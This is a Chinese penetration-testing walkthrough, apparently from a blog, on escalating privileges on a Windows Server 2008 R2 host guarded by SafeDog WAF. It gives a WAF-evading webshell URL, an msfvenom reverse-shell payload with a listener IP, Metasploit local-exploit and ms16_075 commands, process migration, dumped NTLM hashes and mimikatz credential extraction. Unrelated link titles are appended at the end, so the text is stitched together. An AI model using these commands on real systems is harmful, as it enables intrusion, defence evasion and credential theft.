这篇文章放在内部已经有一万年了。

1、简介

服务器 (vps)上安装了iis安全狗 服务器安全狗通常这种服务器都是比较难提权 不仅是漏洞补丁修复得差不多,waf 对于常规的提权方法也是拦截得较多。

aspx大马 被查杀 拦截 不能访问所以要用内部过waf的 暗月过狗刀 基本过一切waf

中国菜刀 一句话 客户端 菜刀发送的包里面包含eval特征会被waf拦截,服务端一句话一般都会拦截。除了做了一些变异。

现在的测试环境

环境是 Microsoft Windows Web Server 2008 R2

WEB环境 php asp aspx

数据库mysql

iis安全狗 服务器安全狗都是安装默认的设置。

大马的拦截

2、提权过程

使用过狗刀过iis安全狗

http://www.moondemo.com/c32as.aspx c32as

执行简单的命令

使用CVE-2014-4113-Exploit 提权失败

提权失败 没有提权system权限 使用metasploit提权生成攻击载核

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.134  lport=12345 -f exe >/var/www/html/s.exe

监听

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost192.168.0.134set lport 12345exploit

查看当前的用户 iis

使用检测提权的模块

use post/multi/recon/local_exploit_suggesterset session 1exploit

使用ms16_075提权use exploit/windows/local/ms16_075_reflection_juicyset session 1查看当前权限getuid

安全狗的一些进程
C:\Program Files(x86)\SafeDog\SafeDogSiteIIS\SafeDogSiteIIS.exe
C:\Program Files(x86)\SafeDog\SafeDogServer\SafeDogTray.exe
migrate 1596  迁移进程 注入到其他进程里面
获取获取hash
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
moon:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
moon123:1005:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:5119ef7093e8490f9564144bc3160a29:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:db1b07ef2d6b61fed7fa7e44f44caba1:::
zero:1004:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

假如不能获取hash 就用

getsystem 获取系统权限

run post/windows/gather/smart_hashdump

aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d432ed87bdb5fdc5e9cba88547376818d4拿到cmd5上是解密

run getgui -u zero-p 123456
增加超级管理用户到服务器上 这种模式服务器安全狗会拦截

获取明文加载mimikatz模块
load mimikatz
获取铭文hash
msv
获取明文密码
Kerberos

假如上面获取不到明文
另外一种方法获取hash
mimikatz_command -f samdump::hashes

mimikatz_command-f sekurlsa::searchPasswords

用wdigest命令获取明文wdigesttspkg

登录远程终端

安全模式 提权_WEB安全第八章实战篇01 提权安全狗服务器相关推荐

  1. (二十二)深入浅出TCPIP之实战篇—用c++开发一个http服务器

    在当前的网络编程专栏前十几篇文章里,我已经说明了TCPIP常用的一些原理,那么接下来我将逐步进入到实战编程阶段: 本篇文章我将带大家用C++做一个http服务器.既然想实现一个http服务器,首先必须 ...

  2. Kong 优雅实现微服务网关鉴权,登录场景落地实战篇

    目录 登录实现 B 端登录之后,浏览器存 cookie 登录代码实现细节,cookie设计 网关介绍 API 网关是什么 为什么需要网关 从技术角度来看,什么是Kong? 为什么使用 Kong Kon ...

  3. 深入浅出TCPIP之实战篇—用c++开发一个http服务器(二十一)

    专栏其他文章: 理论篇: (一)深入浅出TCPIP之理解TCP报文格式和交互流程 (二)深入浅出TCPIP之再识TCP,理解TCP三次握手(上) (三)深入浅出TCPIP之再识TCP,理解TCP四次挥 ...

  4. Docker JFrog Artifactory 7.27.10 maven私服(IDEA 实战篇01) linux

    文章目录 一.私服配置 1. 账户密码 2. 本地仓库 3. ip/port 二.IntelliJ IDEA 2.1. 创建项目 2.2. 指定配置 2.3. 下载依赖 2.4. 依赖查看 2.5. ...

  5. 洗礼灵魂,修炼python(82)--全栈项目实战篇(10)—— 信用卡+商城项目(模拟京东淘宝)...

    本次项目相当于对python基础做总结,常用语法,数组类型,函数,文本操作等等 本项目在博客园里其他开发者也做过,我是稍作修改来的,大体没变的 项目需求: 信用卡+商城: A.信用卡(类似白条/花呗) ...

  6. OKR之剑·实战篇06:OKR致胜法宝-氛围业绩双轮驱动(下)

    作者:vivo 互联网平台产品研发团队 本文是<OKR 之剑>系列之实战第 6 篇-- 本文介绍团队营造氛围的方法与实践.在业绩方面的探索与输出,在两方面分别总结了一些经验分享给大家. 一 ...

  7. OKR之剑·实战篇05:OKR致胜法宝-氛围业绩双轮驱动(上)

    作者:vivo 互联网平台产品研发团队 本文是<OKR 之剑>系列之实战第 5 篇-- 我们的OKR执行如此顺利,离不开我们的"双轮驱动".类似于亚马逊的"飞 ...

  8. 操作系统权限提升(十五)之绕过UAC提权-基于白名单DLL劫持绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权 操作系统权限提升(十四)之绕过UAC提权-基于白名 ...

  9. MySQL提权总结与记录-UDF/MOF/启动项提权

    0x00 Mysql提权基础 Mysql提权主要是需要利用高权限的Mysql用户进行操作,拿用户主要是下列几种方式 注入 上传getshell 查看网站数据库配置信息拿到用户密码 弱口令 mysql系 ...

  10. 手撕 CNN 经典网络之 VGGNet(PyTorch实战篇)

    大家好,我是红色石头! 在上一篇文章: 手撕 CNN 经典网络之 VGGNet(理论篇) 详细介绍了 VGGNet 的网络结构,今天我们将使用 PyTorch 来复现VGGNet网络,并用VGGNet ...

最新文章

  1. vue基础9(babel)
  2. WP7 开发(二) 通过Geometries来绘制形状
  3. tableau实战系列(三十)- 多细节层次(LOD) 计算产品销售周期延申表达式详解
  4. Python之tkinter:动态演示调用python库的tkinter带你进入GUI世界(Scale/Scale的Command)
  5. su 与 sudo 区别
  6. 我对创业和管理的一些看法
  7. python怎么读写_python怎么读写文件
  8. (王道408考研操作系统)第四章文件管理-第一节9:文件系统的层次结构
  9. SOAP协议初级指南(7)
  10. SpringBoot + Dubbo + Zookeeper搭建一个简单的分布式服务
  11. CentOS常用基础命令大全
  12. Android应用开发进阶,2021Android最新大厂面试真题
  13. vs2012 ultimate 密钥
  14. 看图识物_‎App Store 上的“认识动物-看图识物大全、学英语”
  15. DNS的作用和解析过程描述
  16. c语言学籍信息录入,C语言程序报告 学生学籍信息管理系统.doc
  17. iReport简单使用
  18. 中蜂几月份自然分蜂_中蜂一年自然分蜂几次?_库百科养蜂养殖
  19. 编程语言python这个词怎么翻译_五大理由从 Python 转到 Go 语言【已翻译100%】...
  20. 制作ESXI6.7启动盘

热门文章

  1. 基础03 JVM到底在哪里?
  2. 两个DIV高度自适应方法(左右两个DIV高度一样)
  3. C/c++输入输出函数
  4. awr报告与statspack报告
  5. eclipse混淆打包出错
  6. [引]SQL帮助文档:使用 WAITFOR 使SQL语句停顿后执行
  7. 190412每日一句
  8. 190330每日一句
  9. Atitit mybatis 配置 redis 集成 attilax总结 艾提拉总结 1.1. setting name=cacheEnabled v 1 1.2. Mapper文件 1 1.
  10. Atitit.每周末总结 于每周一计划日程表 流程表 v8 -------------import 上周遗漏日志补充 检查话费 检查流量情况 Crm问候 Crm表total and 问候